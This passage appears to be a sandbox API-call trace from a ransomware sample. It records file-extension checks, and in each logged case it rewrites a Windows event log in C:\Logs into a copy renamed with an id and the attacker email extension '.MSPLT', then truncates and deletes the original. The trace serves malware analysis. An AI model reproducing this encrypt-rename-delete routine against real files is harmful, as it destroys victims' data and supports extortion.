(lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0294.653] lstrlenW (lpString=".doc") returned 4 [0294.653] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0294.653] lstrlenW (lpString=".docx") returned 5 [0294.653] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0294.653] lstrlenW (lpString=".pdf") returned 4 [0294.653] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0294.653] lstrlenW (lpString=".xls") returned 4 [0294.653] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0294.653] lstrlenW (lpString=".xlsx") returned 5 [0294.653] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0294.653] lstrlenW (lpString=".ppt") returned 4 [0294.653] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0294.653] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0294.654] lstrlenW (lpString=".zip") returned 4 [0294.654] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0294.654] lstrlenW (lpString=".rar") returned 4 [0294.654] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0294.654] lstrlenW (lpString=".bz2") returned 4 [0294.654] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0294.654] lstrlenW (lpString=".7z") returned 3 [0294.654] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0294.654] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0294.654] lstrlenW (lpString=".dbf") returned 4 [0294.654] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0294.654] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0294.654] lstrlenW (lpString=".1cd") returned 4 [0294.654] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0294.654] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0294.654] lstrlenW (lpString=".jpg") returned 4 [0294.654] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0294.654] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0294.654] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0294.654] lstrlenW (lpString=".doc") returned 4 [0294.654] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0294.654] lstrlenW (lpString=".docx") returned 5 [0294.654] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0294.655] lstrlenW (lpString=".pdf") returned 4 [0294.655] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0294.655] lstrlenW (lpString=".xls") returned 4 [0294.655] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0294.655] lstrlenW (lpString=".xlsx") returned 5 [0294.655] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0294.655] lstrlenW (lpString=".ppt") returned 4 [0294.655] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0294.655] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0294.655] lstrlenW (lpString=".zip") returned 4 [0294.655] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0294.655] lstrlenW (lpString=".rar") returned 4 [0294.655] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0294.655] lstrlenW (lpString=".bz2") returned 4 [0294.655] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0294.655] lstrlenW (lpString=".7z") returned 3 [0294.655] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0294.655] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0294.655] lstrlenW (lpString=".dbf") returned 4 [0294.655] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0294.655] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0294.655] lstrlenW (lpString=".1cd") returned 4 [0294.655] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0294.655] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 74 [0294.656] lstrlenW (lpString=".jpg") returned 4 [0294.656] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0294.656] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0294.656] lstrlenW (lpString="Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 44 [0294.656] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0294.657] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=69632) returned 1 [0294.657] CloseHandle (hObject=0x464) returned 1 [0294.657] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx")) returned 0x20 [0294.657] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0294.657] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0294.657] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.657] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.658] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0294.658] GetLastError () returned 0x0 [0294.658] ReadFile (in: hFile=0x464, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x11000, lpOverlapped=0x0) returned 1 [0294.668] WriteFile (in: hFile=0x37c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x11010, lpOverlapped=0x0) returned 1 [0294.672] ReadFile (in: hFile=0x464, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0294.672] WriteFile (in: hFile=0x37c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x12c, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x12c, lpOverlapped=0x0) returned 1 [0294.672] SetEndOfFile (hFile=0x37c) returned 1 [0294.672] CloseHandle (hObject=0x37c) returned 1 [0294.681] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.681] SetEndOfFile (hFile=0x464) returned 1 [0294.683] CloseHandle (hObject=0x464) returned 1 [0294.683] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0294.683] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx")) returned 1 [0294.684] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0294.684] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0294.684] lstrlenW (lpString=".doc") returned 4 [0294.684] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0294.684] lstrlenW (lpString=".docx") returned 5 [0294.684] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0294.684] lstrlenW (lpString=".pdf") returned 4 [0294.684] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0294.684] lstrlenW (lpString=".xls") returned 4 [0294.684] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0294.684] lstrlenW (lpString=".xlsx") returned 5 [0294.684] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0294.684] lstrlenW (lpString=".ppt") returned 4 [0294.684] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0294.684] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0294.684] lstrlenW (lpString=".zip") returned 4 [0294.684] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0294.684] lstrlenW (lpString=".rar") returned 4 [0294.684] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0294.685] lstrlenW (lpString=".bz2") returned 4 [0294.685] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0294.685] lstrlenW (lpString=".7z") returned 3 [0294.685] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0294.685] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0294.685] lstrlenW (lpString=".dbf") returned 4 [0294.685] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0294.685] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0294.685] lstrlenW (lpString=".1cd") returned 4 [0294.685] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0294.685] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0294.685] lstrlenW (lpString=".jpg") returned 4 [0294.685] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0294.685] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0294.685] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0294.685] lstrlenW (lpString=".doc") returned 4 [0294.685] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0294.685] lstrlenW (lpString=".docx") returned 5 [0294.685] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0294.685] lstrlenW (lpString=".pdf") returned 4 [0294.686] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0294.686] lstrlenW (lpString=".xls") returned 4 [0294.686] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0294.686] lstrlenW (lpString=".xlsx") returned 5 [0294.686] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0294.686] lstrlenW (lpString=".ppt") returned 4 [0294.686] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0294.686] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0294.686] lstrlenW (lpString=".zip") returned 4 [0294.686] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0294.686] lstrlenW (lpString=".rar") returned 4 [0294.686] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0294.686] lstrlenW (lpString=".bz2") returned 4 [0294.686] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0294.686] lstrlenW (lpString=".7z") returned 3 [0294.686] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0294.686] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0294.686] lstrlenW (lpString=".dbf") returned 4 [0294.686] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0294.686] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0294.686] lstrlenW (lpString=".1cd") returned 4 [0294.686] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0294.686] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0294.687] lstrlenW (lpString=".jpg") returned 4 [0294.687] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0294.687] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0294.687] lstrlenW (lpString="Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 45 [0294.687] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0294.687] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=69632) returned 1 [0294.688] CloseHandle (hObject=0x464) returned 1 [0294.688] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx")) returned 0x20 [0294.688] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0294.688] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0294.688] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.688] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.688] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0294.689] GetLastError () returned 0x0 [0294.689] ReadFile (in: hFile=0x464, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x11000, lpOverlapped=0x0) returned 1 [0294.968] WriteFile (in: hFile=0x37c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x11010, lpOverlapped=0x0) returned 1 [0294.971] ReadFile (in: hFile=0x464, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0294.971] WriteFile (in: hFile=0x37c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x12e, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x12e, lpOverlapped=0x0) returned 1 [0294.971] SetEndOfFile (hFile=0x37c) returned 1 [0295.121] CloseHandle (hObject=0x37c) returned 1 [0295.124] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.124] SetEndOfFile (hFile=0x464) returned 1 [0295.126] CloseHandle (hObject=0x464) returned 1 [0295.126] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0295.127] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx")) returned 1 [0295.127] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0295.127] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0295.127] lstrlenW (lpString=".doc") returned 4 [0295.127] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0295.127] lstrlenW (lpString=".docx") returned 5 [0295.127] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0295.127] lstrlenW (lpString=".pdf") returned 4 [0295.127] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0295.127] lstrlenW (lpString=".xls") returned 4 [0295.127] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0295.127] lstrlenW (lpString=".xlsx") returned 5 [0295.127] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0295.127] lstrlenW (lpString=".ppt") returned 4 [0295.127] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0295.127] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0295.127] lstrlenW (lpString=".zip") returned 4 [0295.127] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0295.128] lstrlenW (lpString=".rar") returned 4 [0295.128] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0295.128] lstrlenW (lpString=".bz2") returned 4 [0295.128] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0295.128] lstrlenW (lpString=".7z") returned 3 [0295.128] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0295.128] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0295.128] lstrlenW (lpString=".dbf") returned 4 [0295.128] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0295.128] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0295.128] lstrlenW (lpString=".1cd") returned 4 [0295.128] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0295.128] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0295.128] lstrlenW (lpString=".jpg") returned 4 [0295.128] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0295.128] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0295.128] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0295.128] lstrlenW (lpString=".doc") returned 4 [0295.128] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0295.128] lstrlenW (lpString=".docx") returned 5 [0295.128] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0295.128] lstrlenW (lpString=".pdf") returned 4 [0295.128] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0295.128] lstrlenW (lpString=".xls") returned 4 [0295.128] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0295.129] lstrlenW (lpString=".xlsx") returned 5 [0295.129] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0295.129] lstrlenW (lpString=".ppt") returned 4 [0295.129] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0295.129] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0295.129] lstrlenW (lpString=".zip") returned 4 [0295.129] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0295.129] lstrlenW (lpString=".rar") returned 4 [0295.129] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0295.129] lstrlenW (lpString=".bz2") returned 4 [0295.129] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0295.129] lstrlenW (lpString=".7z") returned 3 [0295.129] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0295.129] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0295.129] lstrlenW (lpString=".dbf") returned 4 [0295.129] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0295.129] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0295.129] lstrlenW (lpString=".1cd") returned 4 [0295.129] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0295.129] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0295.129] lstrlenW (lpString=".jpg") returned 4 [0295.129] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0295.129] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0295.129] lstrlenW (lpString="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 82 [0295.130] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0295.130] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=69632) returned 1 [0295.130] CloseHandle (hObject=0x464) returned 1 [0295.130] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx")) returned 0x20 [0295.130] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0295.130] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0295.131] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.131] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.131] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0295.133] GetLastError () returned 0x0 [0295.133] ReadFile (in: hFile=0x464, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x11000, lpOverlapped=0x0) returned 1 [0295.220] WriteFile (in: hFile=0x37c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x11010, lpOverlapped=0x0) returned 1 [0295.223] ReadFile (in: hFile=0x464, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0295.223] WriteFile (in: hFile=0x37c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x178, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x178, lpOverlapped=0x0) returned 1 [0295.223] SetEndOfFile (hFile=0x37c) returned 1 [0295.229] CloseHandle (hObject=0x37c) returned 1 [0295.236] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.236] SetEndOfFile (hFile=0x464) returned 1 [0295.238] CloseHandle (hObject=0x464) returned 1 [0295.238] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0295.239] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx")) returned 1 [0295.308] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0295.308] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0295.308] lstrlenW (lpString=".doc") returned 4 [0295.308] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0295.308] lstrlenW (lpString=".docx") returned 5 [0295.309] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0295.309] lstrlenW (lpString=".pdf") returned 4 [0295.328] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0295.328] lstrlenW (lpString=".xls") returned 4 [0295.328] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0295.328] lstrlenW (lpString=".xlsx") returned 5 [0295.328] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0295.328] lstrlenW (lpString=".ppt") returned 4 [0295.328] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0295.328] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0295.328] lstrlenW (lpString=".zip") returned 4 [0295.328] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0295.328] lstrlenW (lpString=".rar") returned 4 [0295.328] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0295.328] lstrlenW (lpString=".bz2") returned 4 [0295.329] lstrcmpiW (lpString1=".bz2", 